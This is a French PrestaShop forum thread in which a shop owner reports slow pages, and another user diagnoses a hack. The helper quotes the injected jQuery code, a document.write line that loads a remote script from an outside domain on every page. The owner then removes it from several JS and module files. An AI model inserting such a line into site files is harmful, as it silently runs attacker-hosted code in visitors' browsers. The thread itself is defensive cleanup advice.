cparou Posted March 12, 2014 Share Posted March 12, 2014 (edited) Bonjour,Je suis sous prestashop 1.5.6 et hébergé chez OVH mutualisé. Mon site est lent à charger mais je ne pense pas que cela vienne (essentiellement...) de l'hébergement.Que ce soit dans le Back Office ou le Front Office, à chaque fois que je vais dans une page, j'ai, en plus de mon site, "en attente de bing.com et de www.fabioeanna... (site que je ne connais pas)", et quelque soit le navigateur.Apparemment il y aurait un script qui fait appel à ces sites et je ne le retrouve pas dans mon code.Ce qui me paraît bizarre c'est que ça le fasse aussi dans le back office.mon site : cparou.comQuelqu'un a déjà eu le même problème ou aurait une idée, une solution ?Merci !Bonne journée. Edited March 12, 2014 by cparou (see edit history) Link to comment Share on other sites More sharing options...
JPresta.com Posted March 12, 2014 Share Posted March 12, 2014 Attention tu as probablement été piraté, voici ce que contient ta librairie jquery: /*19f955*/ /*ff093f09*/ document.write("<script type='text/javascript' src='http://fabioeannalisasposi.com/g2FhjGwb.php?id='></"+ "script>"); /*/19f955*/ Fait vite du ménage! Aussi, active CCC ça ira plus vite Link to comment Share on other sites More sharing options...
cparou Posted March 12, 2014 Author Share Posted March 12, 2014 Merci pour l'info ! Je l'ai trouvé dans jquery-1.7.2.min.js jquery-migrate-1.2.1.js jquery-ui.will.be.removed.in.1.6.js ça va mieux mais j'ai l'impression qu'il doit en rester car je le vois toujours apparaître. Link to comment Share on other sites More sharing options...
cparou Posted March 12, 2014 Author Share Posted March 12, 2014 j'ai trouvé beaucoup d'autres fichiers, je pense avoir fait le tour des js mais ça apparait toujours... Link to comment Share on other sites More sharing options...
JPresta.com Posted March 12, 2014 Share Posted March 12, 2014 j'ai trouvé beaucoup d'autres fichiers, je pense avoir fait le tour des js mais ça apparait toujours... Dans favoriteproduct.js Link to comment Share on other sites More sharing options...
cparou Posted March 12, 2014 Author Share Posted March 12, 2014 UN GRAND MERCIII ! Cette fois je crois que c'est la bonne, j'ai fait tous les modules et il y en avait un peu partout. Link to comment Share on other sites More sharing options...
JPresta.com Posted March 12, 2014 Share Posted March 12, 2014 N'oubliez pas d'activer CCC pour que votre site soit plus rapide! (dans le menu Performances) 1 Link to comment Share on other sites More sharing options...
cparou Posted March 12, 2014 Author Share Posted March 12, 2014 Fait. Merci encore. Link to comment Share on other sites More sharing options...
Recommended Posts